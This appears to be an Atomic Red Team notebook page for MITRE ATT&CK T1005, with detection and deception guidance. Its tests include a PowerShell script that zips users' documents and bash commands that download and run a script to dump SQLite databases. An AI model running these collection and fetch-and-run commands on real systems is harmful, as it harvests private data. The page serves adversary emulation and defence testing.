# T1005 - Data from Local System
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.


## Atomic Tests

### Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)This test searches for files of certain extensions and saves them to a single zip file prior to extraction.                              
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$startingDirectory = "C:\Users"
$outputZip = "PathToAtomicsFolder\..\ExternalPayloads\T1005"
$fileExtensionsString = ".doc, .docx, .txt" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }
```

In [ ]:
Invoke-AtomicTest T1005 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item -Path  $outputZip\data.zip -Force
```

In [ ]:
Invoke-AtomicTest T1005 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Find and dump sqlite databases (Linux)
An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Check if running on a Debian based machine.

##### Check Prereq Commands:
```bash
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi

```
##### Get Prereq Commands:
```bash
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi

```

In [ ]:
Invoke-AtomicTest T1005 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
cd $HOME
curl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/art
curl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/gta.db
curl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
```

In [ ]:
Invoke-AtomicTest T1005 -TestNumbers 2

#### Cleanup: 
```bash
rm -f $HOME/.art
rm -f $HOME/gta.db
rm -f $HOME/sqlite_dump.sh 
```

In [ ]:
Invoke-AtomicTest T1005 -TestNumbers 2 -Cleanup

## Detection
Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

For network infrastructure devices, collect AAA logging to monitor `show` commands that view configuration files. 


## Shield Active Defense
### Pocket Litter 
 Place data on a system to reinforce the legitimacy of the system or user. 

 Pocket Litter is data placed on a system to convince an adversary that the system and users are real.  Pocket litter includes documents, registry entries, log history, browsing history, connection history, and other user data that one would expect to exist on a user's computer.  This content may overlap with Decoy Content, however Pocket Litter covers aspects beyond just content (e.g.: Installed Applications, source code, clutter on a system, etc.).
#### Opportunity
In an adversary engagement scenario, there is an opportunity to add legitimacy by ensuring the local system is with fully populated with content.
#### Use Case
A defender can stage a variety of pocket litter files to bolster the legitimacy of the local system.
#### Procedures
When staging a decoy system and user account, populate a user's folders and web history to make it look realistic to an adversary.
Stage a USB device with documents on a specific topic in order to see if they are exfiltrated by an adversary.
